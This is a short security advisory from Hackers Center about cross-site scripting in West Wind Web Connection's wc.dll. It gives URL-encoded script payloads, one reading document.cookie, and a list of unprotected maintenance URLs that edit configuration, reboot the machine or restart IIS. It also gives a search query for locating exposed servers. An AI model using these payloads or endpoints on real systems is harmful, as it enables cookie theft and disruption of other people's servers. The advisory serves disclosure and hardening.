wconnect-xss.txt

` [HSC] WCONNECT WC.DLL Cross-Site Scripting Vulnerability  
  
West Wind Web Connection is a tool for building Web applications using the  
Visual FoxPro environment but is also Vulnerable to Cross-Site scripting  
attacks. Admins need to password protect the application since its installed  
with out password on default. Also senatize the code to disallow xss attacks  
or javascript.  
  
  
  
Hackers Center Security Group (http://www.hackerscenter.com)  
Credit: Doz  
  
Risk: Medium  
Class: Cross Site Scripting  
Remote: YES  
Local: Yes  
  
  
Vendor: West Wind Technologies http://www.west-wind.com  
Product Version: All Versions  
  
  
  
* Attackers can exploit these issues via a web client.  
  
  
  
Examples:  
  
/wc.dll?=%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E  
/wiki/wc.dll?AA~%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E  
/wc.dll?Wiki~Admin/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E  
  
  
Remote Privileges Escalation: (Password Unprotected Application)  
  
  
Log - /wc.dll?wwmaint~showlog  
ISAPI Configuration - /wc.dll?_maintain~ShowStatus  
DLL Error Log - /wc.dll?wwMaint~wcDLLErrorLog  
Server Status - /wc.dll?wwMaint~ServerStatus  
View of settings - /wc.dll?wwmaint~ShowStatus  
Editing Config Files - /wc.dll?wwMaint~EditConfig  
Reboot Machine - /wc.dll?wwMaint~RebootMachine  
Restart IIS - /wc.dll?wwMaint~RebootMachine~&RestartOnly=On  
Web Connection Kill - /wc.dll?wwmaint~sessions~KILL  
  
  
  
  
  
Google Search:  
  
http://www.google.com/search?q=ext%3Adll+inurl%3A%28wc%29&btnG=Search&hl=en  
  
  
Only becoming a Ethical Hacker, you can stop a Hacker. Learn with out having  
to pay thousands!- http://kit.hackerscenter.com - The most comprehensive  
security  
pack you will ever find on the net!  
------------------------------  
`